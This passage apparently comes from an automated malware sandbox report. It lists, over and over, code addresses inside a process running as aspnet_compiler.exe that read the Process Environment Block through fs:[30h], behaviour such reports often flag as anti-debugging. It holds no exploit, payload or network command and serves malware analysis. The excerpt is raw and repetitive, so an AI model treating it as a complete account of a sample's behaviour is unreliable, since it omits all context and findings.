          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011550D9 mov eax, dword ptr fs:[00000030h]5_2_011550D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011020DE mov eax, dword ptr fs:[00000030h]5_2_011020DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD0C0 mov eax, dword ptr fs:[00000030h]5_2_010FD0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD0C0 mov eax, dword ptr fs:[00000030h]5_2_010FD0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A90DB mov eax, dword ptr fs:[00000030h]5_2_010A90DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010880E9 mov eax, dword ptr fs:[00000030h]5_2_010880E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0107A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A50E4 mov eax, dword ptr fs:[00000030h]5_2_010A50E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A50E4 mov ecx, dword ptr fs:[00000030h]5_2_010A50E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107C0F0 mov eax, dword ptr fs:[00000030h]5_2_0107C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C20F0 mov ecx, dword ptr fs:[00000030h]5_2_010C20F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BA30B mov eax, dword ptr fs:[00000030h]5_2_010BA30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BA30B mov eax, dword ptr fs:[00000030h]5_2_010BA30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BA30B mov eax, dword ptr fs:[00000030h]5_2_010BA30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107C310 mov ecx, dword ptr fs:[00000030h]5_2_0107C310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A0310 mov ecx, dword ptr fs:[00000030h]5_2_010A0310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110930B mov eax, dword ptr fs:[00000030h]5_2_0110930B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110930B mov eax, dword ptr fs:[00000030h]5_2_0110930B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110930B mov eax, dword ptr fs:[00000030h]5_2_0110930B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AF32A mov eax, dword ptr fs:[00000030h]5_2_010AF32A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01077330 mov eax, dword ptr fs:[00000030h]5_2_01077330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114132D mov eax, dword ptr fs:[00000030h]5_2_0114132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114132D mov eax, dword ptr fs:[00000030h]5_2_0114132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114A352 mov eax, dword ptr fs:[00000030h]5_2_0114A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107D34C mov eax, dword ptr fs:[00000030h]5_2_0107D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107D34C mov eax, dword ptr fs:[00000030h]5_2_0107D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110035C mov eax, dword ptr fs:[00000030h]5_2_0110035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110035C mov eax, dword ptr fs:[00000030h]5_2_0110035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110035C mov eax, dword ptr fs:[00000030h]5_2_0110035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110035C mov ecx, dword ptr fs:[00000030h]5_2_0110035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110035C mov eax, dword ptr fs:[00000030h]5_2_0110035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110035C mov eax, dword ptr fs:[00000030h]5_2_0110035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01155341 mov eax, dword ptr fs:[00000030h]5_2_01155341
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079353 mov eax, dword ptr fs:[00000030h]5_2_01079353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079353 mov eax, dword ptr fs:[00000030h]5_2_01079353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01102349 mov eax, dword ptr fs:[00000030h]5_2_01102349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112437C mov eax, dword ptr fs:[00000030h]5_2_0112437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113F367 mov eax, dword ptr fs:[00000030h]5_2_0113F367
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01087370 mov eax, dword ptr fs:[00000030h]5_2_01087370
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01087370 mov eax, dword ptr fs:[00000030h]5_2_01087370
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01087370 mov eax, dword ptr fs:[00000030h]5_2_01087370
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A438F mov eax, dword ptr fs:[00000030h]5_2_010A438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A438F mov eax, dword ptr fs:[00000030h]5_2_010A438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0115539D mov eax, dword ptr fs:[00000030h]5_2_0115539D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107E388 mov eax, dword ptr fs:[00000030h]5_2_0107E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107E388 mov eax, dword ptr fs:[00000030h]5_2_0107E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107E388 mov eax, dword ptr fs:[00000030h]5_2_0107E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01078397 mov eax, dword ptr fs:[00000030h]5_2_01078397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01078397 mov eax, dword ptr fs:[00000030h]5_2_01078397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01078397 mov eax, dword ptr fs:[00000030h]5_2_01078397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010D739A mov eax, dword ptr fs:[00000030h]5_2_010D739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010D739A mov eax, dword ptr fs:[00000030h]5_2_010D739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B33A0 mov eax, dword ptr fs:[00000030h]5_2_010B33A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B33A0 mov eax, dword ptr fs:[00000030h]5_2_010B33A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A33A5 mov eax, dword ptr fs:[00000030h]5_2_010A33A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0113B3D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A3C0 mov eax, dword ptr fs:[00000030h]5_2_0108A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A3C0 mov eax, dword ptr fs:[00000030h]5_2_0108A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A3C0 mov eax, dword ptr fs:[00000030h]5_2_0108A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A3C0 mov eax, dword ptr fs:[00000030h]5_2_0108A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A3C0 mov eax, dword ptr fs:[00000030h]5_2_0108A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A3C0 mov eax, dword ptr fs:[00000030h]5_2_0108A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010883C0 mov eax, dword ptr fs:[00000030h]5_2_010883C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010883C0 mov eax, dword ptr fs:[00000030h]5_2_010883C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010883C0 mov eax, dword ptr fs:[00000030h]5_2_010883C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010883C0 mov eax, dword ptr fs:[00000030h]5_2_010883C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113C3CD mov eax, dword ptr fs:[00000030h]5_2_0113C3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010903E9 mov eax, dword ptr fs:[00000030h]5_2_010903E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011553FC mov eax, dword ptr fs:[00000030h]5_2_011553FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B63FF mov eax, dword ptr fs:[00000030h]5_2_010B63FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113F3E6 mov eax, dword ptr fs:[00000030h]5_2_0113F3E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E3F0 mov eax, dword ptr fs:[00000030h]5_2_0109E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E3F0 mov eax, dword ptr fs:[00000030h]5_2_0109E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E3F0 mov eax, dword ptr fs:[00000030h]5_2_0109E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B7208 mov eax, dword ptr fs:[00000030h]5_2_010B7208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B7208 mov eax, dword ptr fs:[00000030h]5_2_010B7208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01155227 mov eax, dword ptr fs:[00000030h]5_2_01155227
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107823B mov eax, dword ptr fs:[00000030h]5_2_0107823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113B256 mov eax, dword ptr fs:[00000030h]5_2_0113B256
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113B256 mov eax, dword ptr fs:[00000030h]5_2_0113B256
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B724D mov eax, dword ptr fs:[00000030h]5_2_010B724D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079240 mov eax, dword ptr fs:[00000030h]5_2_01079240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079240 mov eax, dword ptr fs:[00000030h]5_2_01079240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01086259 mov eax, dword ptr fs:[00000030h]5_2_01086259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107A250 mov eax, dword ptr fs:[00000030h]5_2_0107A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130274 mov eax, dword ptr fs:[00000030h]5_2_01130274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01084260 mov eax, dword ptr fs:[00000030h]5_2_01084260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01084260 mov eax, dword ptr fs:[00000030h]5_2_01084260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01084260 mov eax, dword ptr fs:[00000030h]5_2_01084260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107826B mov eax, dword ptr fs:[00000030h]5_2_0107826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C1270 mov eax, dword ptr fs:[00000030h]5_2_010C1270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C1270 mov eax, dword ptr fs:[00000030h]5_2_010C1270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A9274 mov eax, dword ptr fs:[00000030h]5_2_010A9274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114D26B mov eax, dword ptr fs:[00000030h]5_2_0114D26B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114D26B mov eax, dword ptr fs:[00000030h]5_2_0114D26B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE284 mov eax, dword ptr fs:[00000030h]5_2_010BE284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE284 mov eax, dword ptr fs:[00000030h]5_2_010BE284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01100283 mov eax, dword ptr fs:[00000030h]5_2_01100283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01100283 mov eax, dword ptr fs:[00000030h]5_2_01100283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01100283 mov eax, dword ptr fs:[00000030h]5_2_01100283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B329E mov eax, dword ptr fs:[00000030h]5_2_010B329E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B329E mov eax, dword ptr fs:[00000030h]5_2_010B329E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01155283 mov eax, dword ptr fs:[00000030h]5_2_01155283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010902A0 mov eax, dword ptr fs:[00000030h]5_2_010902A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010902A0 mov eax, dword ptr fs:[00000030h]5_2_010902A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010952A0 mov eax, dword ptr fs:[00000030h]5_2_010952A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010952A0 mov eax, dword ptr fs:[00000030h]5_2_010952A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010952A0 mov eax, dword ptr fs:[00000030h]5_2_010952A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010952A0 mov eax, dword ptr fs:[00000030h]5_2_010952A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011092BC mov eax, dword ptr fs:[00000030h]5_2_011092BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011092BC mov eax, dword ptr fs:[00000030h]5_2_011092BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011092BC mov ecx, dword ptr fs:[00000030h]5_2_011092BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011092BC mov ecx, dword ptr fs:[00000030h]5_2_011092BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011172A0 mov eax, dword ptr fs:[00000030h]5_2_011172A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011172A0 mov eax, dword ptr fs:[00000030h]5_2_011172A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011162A0 mov eax, dword ptr fs:[00000030h]5_2_011162A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011162A0 mov ecx, dword ptr fs:[00000030h]5_2_011162A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011162A0 mov eax, dword ptr fs:[00000030h]5_2_011162A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011162A0 mov eax, dword ptr fs:[00000030h]5_2_011162A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011162A0 mov eax, dword ptr fs:[00000030h]5_2_011162A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011162A0 mov eax, dword ptr fs:[00000030h]5_2_011162A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011492A6 mov eax, dword ptr fs:[00000030h]5_2_011492A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011492A6 mov eax, dword ptr fs:[00000030h]5_2_011492A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011492A6 mov eax, dword ptr fs:[00000030h]5_2_011492A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011492A6 mov eax, dword ptr fs:[00000030h]5_2_011492A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C0 mov eax, dword ptr fs:[00000030h]5_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C0 mov eax, dword ptr fs:[00000030h]5_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C0 mov eax, dword ptr fs:[00000030h]5_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C0 mov eax, dword ptr fs:[00000030h]5_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C0 mov eax, dword ptr fs:[00000030h]5_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C0 mov eax, dword ptr fs:[00000030h]5_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C0 mov eax, dword ptr fs:[00000030h]5_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A2C3 mov eax, dword ptr fs:[00000030h]5_2_0108A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A2C3 mov eax, dword ptr fs:[00000030h]5_2_0108A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A2C3 mov eax, dword ptr fs:[00000030h]5_2_0108A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A2C3 mov eax, dword ptr fs:[00000030h]5_2_0108A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108A2C3 mov eax, dword ptr fs:[00000030h]5_2_0108A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010892C5 mov eax, dword ptr fs:[00000030h]5_2_010892C5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010892C5 mov eax, dword ptr fs:[00000030h]5_2_010892C5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B2D3 mov eax, dword ptr fs:[00000030h]5_2_0107B2D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B2D3 mov eax, dword ptr fs:[00000030h]5_2_0107B2D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B2D3 mov eax, dword ptr fs:[00000030h]5_2_0107B2D3
